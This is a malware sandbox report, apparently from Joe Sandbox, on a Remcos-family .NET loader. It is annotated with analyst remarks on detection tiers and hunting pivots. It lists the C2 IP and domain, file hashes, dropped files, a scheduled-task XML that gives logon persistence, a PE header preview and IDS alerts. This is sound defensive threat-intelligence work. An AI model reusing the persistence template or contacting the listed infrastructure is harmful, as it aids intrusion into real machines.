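Only 10.0.0.23 is reported: 10.0.0.77 touches geoplugin.net and nothing else, which is exactly the false positive the weak tier is there to suppress. When widening the strong set, the ASN context further down is the place to look: every address it lists for AS135357 falls inside 154.216.16.0/22 and serves Mirai, LummaC or other Remcos samples, so that block is a reasonable candidate for a network-level indicator rather than the single IP.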
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1560114
                            Start date and time:2024-11-21 12:20:52 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 9m 11s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:20
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Purchase Inquiry_002.exe
                            Detection:MAL
                            Classification:mal100.rans.troj.spyw.evad.winEXE@19/17@12/2
                            EGA Information:
                            • Successful, ratio: 75%
                            HCA Information:
                            • Successful, ratio: 96%
                            • Number of executed functions: 212
                            • Number of non-executed functions: 192
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Purchase Inquiry_002.exe, PID 8184 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: Purchase Inquiry_002.exe
Behavior and APIs timeline
Time     | Type            | Description
06:21:44 | API Interceptor | 6220044x Sleep call for process: Purchase Inquiry_002.exe modified
06:21:47 | API Interceptor | 35x Sleep call for process: powershell.exe modified
06:21:49 | API Interceptor | 3x Sleep call for process: xASiLfzXONGIW.exe modified
12:21:47 | Task Scheduler  | Run new task: xASiLfzXONGIW path: C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe

Times are reproduced as the report prints them; the API Interceptor rows and the Task Scheduler row use different clocks (analysis start was 12:20:52 +01:00). The 6,220,044 shortened Sleep calls in the initial process mean the loader burns time in a Sleep loop before acting, which is why the cookbook extended the analysis time for high-CPU targets and is consistent with the analysis stopping on timeout.
Context: IPs seen in other analyses

154.216.19.141
  1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exe (malicious, Remcos)

178.237.33.50
  APPENDIX FORM_N#U00b045013-20241120.com.exe (malicious, Remcos, GuLoader) via geoplugin.net/json.gp
  wE1inOhJA5.msi (malicious, Remcos, RHADAMANTHYS) via geoplugin.net/json.gp
  ORDER AND SPECIFICATIONS.scr.exe (malicious, Remcos) via geoplugin.net/json.gp
  1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe (malicious, Remcos) via geoplugin.net/json.gp
  1732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exe (malicious, Remcos) via geoplugin.net/json.gp
  seethebestthignswhichgivingbestopportunities.hta (malicious, Cobalt Strike, Remcos, HTMLPhisher) via geoplugin.net/json.gp
  pi-77159.xls (malicious, Remcos, HTMLPhisher) via geoplugin.net/json.gp
  sostener.vbs (malicious, Remcos) via geoplugin.net/json.gp
  1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exe (malicious, Remcos) via geoplugin.net/json.gp
  USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe (malicious, Remcos, DBatLoader) via geoplugin.net/json.gp

Context: domains seen in other analyses

cee.work.gd
  1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exe (malicious, Remcos) via 154.216.19.141

geoplugin.net
  APPENDIX FORM_N#U00b045013-20241120.com.exe (malicious, Remcos, GuLoader) via 178.237.33.50
  wE1inOhJA5.msi (malicious, Remcos, RHADAMANTHYS) via 178.237.33.50
  ORDER AND SPECIFICATIONS.scr.exe (malicious, Remcos) via 178.237.33.50
  1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe (malicious, Remcos) via 178.237.33.50
  1732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exe (malicious, Remcos) via 178.237.33.50
  seethebestthignswhichgivingbestopportunities.hta (malicious, Cobalt Strike, Remcos, HTMLPhisher) via 178.237.33.50
  pi-77159.xls (malicious, Remcos, HTMLPhisher) via 178.237.33.50
  sostener.vbs (malicious, Remcos) via 178.237.33.50
  1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exe (malicious, Remcos) via 178.237.33.50
  USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe (malicious, Remcos, DBatLoader) via 178.237.33.50

Context: ASNs seen in other analyses

SKHT-AS Shenzhen Katherine Heng Technology Information Co (AS135357)
  dlr.mpsl.elf (malicious, Mirai, Okiru) via 154.216.18.25
  dlr.arm6.elf (malicious, Mirai, Okiru) via 154.216.18.25
  dlr.x86.elf (malicious, Mirai, Okiru) via 154.216.18.25
  ORDER AND SPECIFICATIONS.scr.exe (malicious, Remcos) via 154.216.16.54
  file.exe (malicious, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc) via 154.216.19.129
  file.exe (malicious, Unknown) via 154.216.19.129
  file.exe (malicious, Unknown) via 154.216.19.129
  1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exe (malicious, Remcos) via 154.216.19.141
  dvwkja7.elf (malicious, Mirai) via 154.216.16.109
  http://www.dvdcollections.co.uk/search/redirect.php?deeplink=https://lp-engenharia.com/zerooo/?email=mwright@burbankca.gov (malicious, HTMLPhisher) via 154.216.17.193

ATOM86-AS ATOM86 NL (AS8455)
  APPENDIX FORM_N#U00b045013-20241120.com.exe (malicious, Remcos, GuLoader) via 178.237.33.50
  wE1inOhJA5.msi (malicious, Remcos, RHADAMANTHYS) via 178.237.33.50
  ORDER AND SPECIFICATIONS.scr.exe (malicious, Remcos) via 178.237.33.50
  1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe (malicious, Remcos) via 178.237.33.50
  1732143786cec792bea7f8ce7f818c031173ce52fabd19dde842f74b07fc234dc9f3fa1dcf839.dat-decoded.exe (malicious, Remcos) via 178.237.33.50
  seethebestthignswhichgivingbestopportunities.hta (malicious, Cobalt Strike, Remcos, HTMLPhisher) via 178.237.33.50
  pi-77159.xls (malicious, Remcos, HTMLPhisher) via 178.237.33.50
  sostener.vbs (malicious, Remcos) via 178.237.33.50
  1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exe (malicious, Remcos) via 178.237.33.50
  USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe (malicious, Remcos, DBatLoader) via 178.237.33.50

Context: JA3 fingerprints: No context
Context: dropped files: No context

Dropped files (one record per file; the report's file names were not preserved in this extract, so each record is introduced by a description of its content)

Dropped file: 232 bytes of high-entropy binary data written by the initial sample
Process:C:\Users\user\Desktop\Purchase Inquiry_002.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):232
                              Entropy (8bit):7.152598493007967
                              Encrypted:false
                              SSDEEP:6:dHfjAxrbum1JZjKPT4JwpJC5d/RtnEbuJHQA:dHcFum1J9KPT/r67VtwA
                              MD5:459A5E89661B24D260FE10EB0A81154D
                              SHA1:5D77694CFA99D47CF0F35A47B2CAD30FDEC4C393
                              SHA-256:E4D708AD5AE3ADDC025EC3AB2E48596D13666114C195349F0B2019D2B4C1949F
                              SHA-512:AFD2827E4FF1F23656E9C6C5A9D496B4D7EAFE4A9869134158EA257126F308E3417BBA8BAF19DE0BD874E5FCBACE88A53FBA023984ECA342E5FF96DBC08D1162
                              Malicious:false
                              Reputation:low
                              Preview:. .w....s.G.w.Lj..)m.........w.Zpy.p.8<....2.P:..CU...?$...$w.....f..E.R.6"}.....z$,.].\.p.H...G.....Ma{...O]...".t-....{.1..0>..5xu...o.@...bh.m.tO.Ke..>..{.^Y]..zIQ..eEB.#......L.U.....U].....!...Uw.[.3n..>.-*.[X.Hk....

Dropped file: .NET CLR assembly-binding usage log written by the initial sample (listed in the behavior graph as Purchase Inquiry_002.exe.log); it records the framework assemblies the loader bound, among them System.Windows.Forms, System.Drawing, System.Configuration and System.Xml
Process:C:\Users\user\Desktop\Purchase Inquiry_002.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:true
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Dropped file: the same CLR usage log, written by the persisted copy xASiLfzXONGIW.exe
Process:C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Dropped file: JSON response from http://geoplugin.net/json.gp, giving the sandbox's egress address (8.46.123.75) and its geolocation; the sample fetches it to geolocate the infected host
Process:C:\Users\user\Desktop\Purchase Inquiry_002.exe
                              File Type:JSON data
                              Category:dropped
                              Size (bytes):962
                              Entropy (8bit):5.015105568788186
                              Encrypted:false
                              SSDEEP:12:tkluQ+nd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qluQydRNuKyGX85jvXhNlT3/7AcV9Wro
                              MD5:8937B63DC0B37E949F38E7874886D999
                              SHA1:62FD17BF5A029DDD3A5CFB4F5FC9FE83A346FFFC
                              SHA-256:AB2F31E4512913B1E7F7ACAB4B72D6E741C960D0A482F09EA6F9D96FED842A66
                              SHA-512:077176C51DC10F155EE08326270C1FE3E6CF36C7ABA75611BDB3CCDA2526D6F0360DBC2FBF4A9963051F0F01658017389FD898980ACF7BB3B29B287F188EE7B9
                              Malicious:false
                              Preview:{. "geoplugin_request":"8.46.123.75",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

Modified file: PowerShell's cache of loaded assemblies (Microsoft.PowerShell.Commands.Management, System.Management.Automation and the rest), a side effect of running powershell.exe rather than attacker-written content
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:modified
                              Size (bytes):2232
                              Entropy (8bit):5.379460230152629
                              Encrypted:false
                              SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZPUyxs:fLHyIFKL3IZ2KRH9OugYs
                              MD5:DEB5A9A8979B751F817ECBC2841F644A
                              SHA1:24CA1EF1CAA9B1E458C2B0A2504A606A1D3F1919
                              SHA-256:94CEDFEA0D52A603FC2D814442996EA37098FC221B2927828ECB986617FC5EEF
                              SHA-512:FE33FD74F0836ED81018ABF53D4451502DC4B3ED6A2CCD14F86B98FD46B63651E4425AC1EC34D91BA5875D82C979CFC7DF585763BAF0B132FC310D9530784018
                              Malicious:false
                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

Dropped file: the probe script powershell.exe writes to the user's Temp directory to test whether AppLocker enforces script lockdown. Eight identical copies were dropped, all with the hashes below; only one record is kept here.
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Dropped file: Task Scheduler XML (tmp3EA3.tmp in the behavior graph) passed to schtasks.exe to register the logon task for xASiLfzXONGIW.exe. Three details are worth noting: the RegistrationInfo date of 2014-10-25 is a hard-coded template value a decade older than the analysis, so it is a usable hunting pivot; the task uses a LogonTrigger for the current user with RunLevel LeastPrivilege, so the persistence needs no elevation; and the file declares encoding="UTF-16" while the file type shows it is written as ASCII.
Process:C:\Users\user\Desktop\Purchase Inquiry_002.exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1572
                              Entropy (8bit):5.1204644578053955
                              Encrypted:false
                              SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTSv:He7XQBBYrFdOFzOz6dKrsu0
                              MD5:137FC4F37CB038A17A4ED8E307485BA6
                              SHA1:C12679A1644AE594A72FD0FA3892C3DC4A0EB396
                              SHA-256:D959E53F5DBDC228656D801E3D2013EB9BD0140608EB6A07CDC50CB119C59C5C
                              SHA-512:6F75E96A1F503E44F08DDEBB953D1A198D7FCBB36D43FC0EC8275C6BE8B64EA5621A0F42E28B754C217318CB55B3C6ED0CB84DDE5B37C756F13977A3ACC97BCE
                              Malicious:true
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                              Process:C:\Users\user\AppData\Roaming\xASiLfzXONGIW.exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1572
                              Entropy (8bit):5.1204644578053955
                              Encrypted:false
                              SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTSv:He7XQBBYrFdOFzOz6dKrsu0
                              MD5:137FC4F37CB038A17A4ED8E307485BA6
                              SHA1:C12679A1644AE594A72FD0FA3892C3DC4A0EB396
                              SHA-256:D959E53F5DBDC228656D801E3D2013EB9BD0140608EB6A07CDC50CB119C59C5C
                              SHA-512:6F75E96A1F503E44F08DDEBB953D1A198D7FCBB36D43FC0EC8275C6BE8B64EA5621A0F42E28B754C217318CB55B3C6ED0CB84DDE5B37C756F13977A3ACC97BCE
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                              Process:C:\Users\user\Desktop\Purchase Inquiry_002.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):914432
                              Entropy (8bit):7.9612048561210855
                              Encrypted:false
                              SSDEEP:24576:WNo7gN9rqhq/5UqutCi1BDUTskujqA5pd6p3MFHdIvYV:QL2hq/6q1i1h4v3A5pdSOWvY
                              MD5:C016B06A4942455DF9CE8A58B72BCC90
                              SHA1:DBA52AFE33451C444FD5CF3C6ACA9D2CED768D2C
                              SHA-256:E115D3BD2903D9D663A7A69EDD08B0BA5F2528C831D17530BBF621648B44894C
                              SHA-512:961475A98CFDC14A29725B43C1807A3EDA08A2257F50D216375FAF262880CE39CF7847D00263D00FD1CE032AD14FBB003B3AB1E78BBD25B3A644F3D6746168FE
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 74%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...U7<g..............0.................. ... ....@.. .......................`............@.................................7...O.... ..L....................@......8...T............................................ ............... ..H............text........ ...................... ..`.rsrc...L.... ......................@..@.reloc.......@......................@..B................k.......H........}...O......i.......0............................................0..$..........s......s.....s ......o!...&..+..*.0..)........s\....s.......o[...s......o".......+...*....0..+........s\....r...p.(#......o[...s......o$....+..*..0..0........s\....rC..p.r...p(%......o[...s......o$....+..*.0...........s\.......O...%.r...p.%...%.r...p.%...%.r...p.%....%.r!..p.%....%.r;..p.%.....%..rU..p.%.....%..ry..p.%....%..r...p.(&......o[...s.......o$...&r...p('...&......o(...('...&...*.
                              Process:C:\Users\user\Desktop\Purchase Inquiry_002.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Preview:[ZoneTransfer]....ZoneId=0
                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.9612048561210855
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              • Win32 Executable (generic) a (10002005/4) 49.75%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Windows Screen Saver (13104/52) 0.07%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              File name:Purchase Inquiry_002.exe
                              File size:914'432 bytes
                              MD5:c016b06a4942455df9ce8a58b72bcc90
                              SHA1:dba52afe33451c444fd5cf3c6aca9d2ced768d2c
                              SHA256:e115d3bd2903d9d663a7a69edd08b0ba5f2528c831d17530bbf621648b44894c
                              SHA512:961475a98cfdc14a29725b43c1807a3eda08a2257f50d216375faf262880ce39cf7847d00263d00fd1ce032ad14fbb003b3ab1e78bbd25b3a644f3d6746168fe
                              SSDEEP:24576:WNo7gN9rqhq/5UqutCi1BDUTskujqA5pd6p3MFHdIvYV:QL2hq/6q1i1h4v3A5pdSOWvY
                              TLSH:2415234223B88B9BD5BE4BF492B2709153F1726B6A31F32C4EE294DD6055F90A79130F
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...U7<g..............0.................. ... ....@.. .......................`............@................................
                              Icon Hash:90cececece8e8eb0
                              Entrypoint:0x4e078a
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x673C3755 [Tue Nov 19 06:59:33 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                              Instruction
                              jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe0737 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe2000 | 0x64c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe4000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xde638 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xde790 | 0xde800 | 139320dbfdddfe7038379597a52bf952 | False | 0.967504608497191 | data | 7.966548982352114 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xe2000 | 0x64c | 0x800 | 9ad2be29f34795eac2e6526b507cdbe1 | False | 0.34228515625 | data | 3.5221250481585593 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe4000 | 0xc | 0x200 | bb53d9c3eb206652af52fbd23d9d7155 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xe2090 | 0x3bc | data | | | 0.41527196652719667
RT_MANIFEST | 0xe245c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-21T12:22:03.765320+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.10 | 49749 | 154.216.19.141 | 2531 | TCP
2024-11-21T12:22:07.045321+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.10 | 49757 | 178.237.33.50 | 80 | TCP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 21, 2024 12:21:48.173746109 CET | 192.168.2.10 | 1.1.1.1 | 0x6c79 | Standard query (0) | cee.work.gd | A (IP address) | IN (0x0001) | false
